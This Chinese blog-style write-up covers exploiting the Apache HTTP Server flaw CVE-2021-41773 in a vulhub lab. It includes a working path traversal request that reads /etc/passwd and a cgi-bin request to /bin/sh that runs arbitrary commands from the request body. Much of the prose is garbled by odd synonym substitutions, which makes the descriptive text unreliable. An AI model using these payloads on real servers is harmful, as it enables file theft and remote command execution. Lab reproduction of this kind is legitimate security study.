原副标题:怎样发掘Apache中的CVE-2021-41773安全漏洞
一、安全漏洞简述
Apache HTTP Server(全称 Apache)是开放源码的 Web 伺服器,能在绝大多数计算机系统作业系统中运转,虽然其多网络平台和可信性被广为采用,是最盛行的 Web 伺服器端应用软件众所周知。它加速、可信因此可透过单纯的 API 扩充,将 Perl/Python 等正则表达式校对到伺服器中。
Apache 公布了两个在 Apache HTTP Server 2.4.49 上导入的安全漏洞,称作 CVE-2021-41773。与此同时正式发布了2.4.50预览,复原了那个安全漏洞。该安全漏洞容许普通用户绕开方向结点为保护,采用代码并加载互联网伺服器磁盘上的任一文档。运转此版 Apache 的 Linux 和 Windows 伺服器都受到负面影响。此安全漏洞是在 2.4.49 中导入的,该插件意在提升 URL 校正的操控性。能透过对“.”展开代码来绕开捷伊校正形式。假如 Apache 互联网伺服器实用性未增设为“明确要求全数婉拒”,则安全漏洞借助相较单纯。透过对那些字符串展开代码并采用有效率阻抗修正 URL,能与此同时实现经典之作的方向结点。
——https://blog.csdn.net/qq_48985780/article/details/120973100
二、负面影响版:
Apache负面影响安全漏洞版:2.4.49、2.4.50;
apache-CVE-2021-41773安全漏洞借助的采用者身分为httpd.conf中选定的采用者,能继续执行该采用者相关联身分职权的随机存取;
三、Cadours试验:
1、试验场自然环境:vulhub构筑
Cd vulhub-master/httpd/CVE-2021-41773
Docker-compose up -d
2、
借助形式一:加载注册表
(1)是用BP截击允诺报文
(2)方向穿越 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
爆出Linux系统的password文档内容
借助形式二、继续执行任一系统命令
(采用BP截击允诺报文) (2)方向改为 “/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh” 必须为cgi-bin (3)在允诺体中 “echo; 命令1&&命令2” //继续执行命令的身分为启动apache进程的身分